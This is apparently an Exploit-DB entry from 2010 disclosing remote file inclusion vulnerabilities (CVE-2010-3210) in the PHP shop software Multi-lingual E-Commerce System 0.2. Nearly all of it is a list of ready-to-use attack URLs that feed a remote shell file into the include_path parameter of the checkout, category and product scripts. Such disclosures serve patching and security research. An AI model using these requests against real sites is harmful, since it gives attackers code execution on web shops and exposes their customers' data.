Multi-lingual E-Commerce System 0.2 - Multiple Remote File Inclusions

Author: JosS
type: webapps
platform: php
port: 
date_added: 2010-08-29  
date_updated: 2010-08-29  
verified: 0  
codes: CVE-2010-3210;OSVDB-67819;OSVDB-67818;OSVDB-67817;OSVDB-67816;OSVDB-67815;OSVDB-67814;OSVDB-67813;OSVDB-67812;OSVDB-67811;OSVDB-67810;OSVDB-67809;OSVDB-67808  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comgeneric-shop-0.2.tar.gz  

raw file: 14835.txt  

Multi-lingual E-Commerce System 0.2 Multiple Remote File Inclusion Vulnerabilities
bug found by Jose Luis Gongora Fernandez (a.k.a) JosS

contact: sys-project[at]hotmail.com
website: http://www.hack0wn.com/

- download: http://sourceforge.net/projects/mlecsphp/

- CMS:

 A multi-lingual multi-currency PHP e-commerce system.

~ [RFI]

http://target/path/inc/checkout2-CYM.php?include_path=[shell.txt?]
http://target/path/inc/checkout2-EN.php?include_path=[shell.txt?]
http://target/path/inc/checkout2-FR.php?include_path=[shell.txt?]
http://target/path/inc/cat-FR.php?include_path=[shell.txt?]
http://target/path/inc/cat-EN.php?include_path=[shell.txt?]
http://target/path/inc/cat-CYM.php?include_path=[shell.txt?]
http://target/path/inc/checkout1-CYM.php?include_path=[shell.txt?]
http://target/path/inc/checkout1-EN.php?include_path=[shell.txt?]
http://target/path/inc/checkout1-FR.php?include_path=[shell.txt?]
http://target/path/inc/prod-CYM.php?include_path=[shell.txt?]
http://target/path/inc/prod-EN.php?include_path=[shell.txt?]
http://target/path/inc/prod-FR.php?include_path=[shell.txt?]
[and more] [...]


__h0__